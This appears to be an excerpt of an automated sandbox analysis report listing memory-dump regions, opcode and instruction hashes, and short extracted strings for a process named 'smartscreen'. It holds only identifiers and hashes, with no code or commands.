                                                                                                      • Opcode ID: 502cf25d093cb36f9a992dd50b8682ff2fd5322d2268deeaf7384070e64a8aca
                                                                                                      • Instruction ID: f16454369e0bf579c7baef099340477bf9a21b3ec0ea3611068f4a4ce5ac6fc3
                                                                                                      • Opcode Fuzzy Hash: 502cf25d093cb36f9a992dd50b8682ff2fd5322d2268deeaf7384070e64a8aca
                                                                                                      • Instruction Fuzzy Hash: 06012970909A8C8FCB55EF18C8A9AA97FF0FF69304F0501AAE448C71A1DB359954CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53885ab9d0abe896ee6f3c1d4591d8fa13df5ed65f0d8a13ba9e491dc4c408d7
                                                                                                      • Instruction ID: de7da3a3010fdabd1e815e78abacd2883bb13ce35fed474baccab8e394b22dcd
                                                                                                      • Opcode Fuzzy Hash: 53885ab9d0abe896ee6f3c1d4591d8fa13df5ed65f0d8a13ba9e491dc4c408d7
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e96ec7ed1fc2586f919388c07542aff8ee7f419ea438f8f8ff63dc75a75aae23
                                                                                                      • Instruction ID: 257f1627c27f34a937885be46e218f6776695ec10582013b34c1cabad2f1f19f
                                                                                                      • Opcode Fuzzy Hash: e96ec7ed1fc2586f919388c07542aff8ee7f419ea438f8f8ff63dc75a75aae23
                                                                                                      • Instruction Fuzzy Hash: C3F0A07590D68D9FDF61EB64886D2EC7FF0FF19300F8504AAD808C60A1E6349294DB02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction ID: 64b485e957cf46a50cb2032e614e853068f5fe4ee00c7ad119b1f52ec8cd93f7
                                                                                                      • Opcode Fuzzy Hash: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction Fuzzy Hash: A5F0C470E2925E8EEB64CFD588643BDB6B1BF5C700F118536C40D962A6DB386A42DB10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5350fa8f86a920ebd8afde3eac57391d8b427f4f91fd9783c1498aef7a55c4a
                                                                                                      • Instruction ID: b95f0b987ce70c3786141ee37ea3b1c74bd4269044c3eddb8ed8cadaaca5ef0b
                                                                                                      • Opcode Fuzzy Hash: f5350fa8f86a920ebd8afde3eac57391d8b427f4f91fd9783c1498aef7a55c4a
                                                                                                      • Instruction Fuzzy Hash: FDF0C270A0991A8BE714DF84C8943F977B1FF54301F04067AC025932D2CBB86680CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 489793a07b99a04b8a521a1bb9043918981e97b644bbb1ef174b685a2449c33e
                                                                                                      • Instruction ID: 4a2f0d2570130bbde8619a42213164d31f03d3539099532e275840da75376e43
                                                                                                      • Opcode Fuzzy Hash: 489793a07b99a04b8a521a1bb9043918981e97b644bbb1ef174b685a2449c33e
                                                                                                      • Instruction Fuzzy Hash: F8F0823181E78D8FDB51DF24C9655D93FA0FF45300F4501B6E858C61A2DB349554C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b886000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 64f0cf2cdcc458b4beed25cdfe94a98f72964f001bed83bf09ccb67d42f0de73
                                                                                                      • Instruction ID: 70301e1b35569fb17b9503ed0a4ce9f5e8a0628a20fd47eb53b2eb496f2eb5e8
                                                                                                      • Opcode Fuzzy Hash: 64f0cf2cdcc458b4beed25cdfe94a98f72964f001bed83bf09ccb67d42f0de73
                                                                                                      • Instruction Fuzzy Hash: 5FF0FE71E059198BE7A4DB18DC696A977A1EF88345F1041F6901D9A2D6CE342E824F40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6bb33281f12d8617ca13984308fb3743bfa91bbb01a31c8a8a991f47ab58d55e
                                                                                                      • Instruction ID: 4106026021c05c4187b324873238baaf244054f0de8c04524ddcbed8c865980a
                                                                                                      • Opcode Fuzzy Hash: 6bb33281f12d8617ca13984308fb3743bfa91bbb01a31c8a8a991f47ab58d55e
                                                                                                      • Instruction Fuzzy Hash: 3FE0D83284E68D4BE321675088751D83F90FF05300F4A01BAE05C864E3DA285558C742
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de200861cd141f841d0159297382c2ac2f5ffa9dd497c8d155f7fbc8a25b637d
                                                                                                      • Instruction ID: 70fccab13a91dcf3fa32f3bc04e8af0fbcf410e8f9351275be48fa78919132d6
                                                                                                      • Opcode Fuzzy Hash: de200861cd141f841d0159297382c2ac2f5ffa9dd497c8d155f7fbc8a25b637d
                                                                                                      • Instruction Fuzzy Hash: 0DD0C262F04D4F47EF1CDA80C8216BD3F62EF14384F400074E42AAA1D9CF2429438740
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e0d4af2c6ccbc4b1f207a219363600784c6d9e2ac97d85597cc164bd56afb50
                                                                                                      • Instruction ID: f3cd0a7bb58df036751da490109943f5310f1ed602d84b04e9fc7c8ce81f43ad
                                                                                                      • Opcode Fuzzy Hash: 3e0d4af2c6ccbc4b1f207a219363600784c6d9e2ac97d85597cc164bd56afb50
                                                                                                      • Instruction Fuzzy Hash: F9D0EC60D09A998BEBA5DB5488747ACAAA4FB58700F0102A9A04DD2682DB341A808B01
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: 28a05adc4603ea3d74cb9fe6c5b9579d937340611f4db10f7bee944f943995c5
                                                                                                      • Instruction ID: a318d07f4c60326cf266ec5117d86ac9404fb913aab533203018ee04d50e1851
                                                                                                      • Opcode Fuzzy Hash: 28a05adc4603ea3d74cb9fe6c5b9579d937340611f4db10f7bee944f943995c5
                                                                                                      • Instruction Fuzzy Hash: A8C10E70A1951D8FDB69DB54C8A4BE8B7B2FF98304F5045F9C01D97295CE35AA81CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: 32a5c4bbd42a8ced043841bc2c288485353844860a86b44e1016de0a314d74f2
                                                                                                      • Instruction ID: 7a8b9323c5afb0515b83f880b6981614eb3c21bbe53149b84d8e2f960ac95200
                                                                                                      • Opcode Fuzzy Hash: 32a5c4bbd42a8ced043841bc2c288485353844860a86b44e1016de0a314d74f2
                                                                                                      • Instruction Fuzzy Hash: CD51EDB0A0962D8FEB68EF54C8547B9B7F2FB58311F1042BAD10D97295CB34AA85CF41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: 621ed7095f79ce2bda9f322c18ca82dc71b74979bad76cb67a86a2f67e293346
                                                                                                      • Instruction ID: f3dbb95bdab3e7bc6620962ea4b70eef9c94e315887c0756156498a50945b45f
                                                                                                      • Opcode Fuzzy Hash: 621ed7095f79ce2bda9f322c18ca82dc71b74979bad76cb67a86a2f67e293346
                                                                                                      • Instruction Fuzzy Hash: A1113370A0922D8BDB68DF44C8547B9B3F2EF98310F1081A6C00D562A5CB34AA85CF81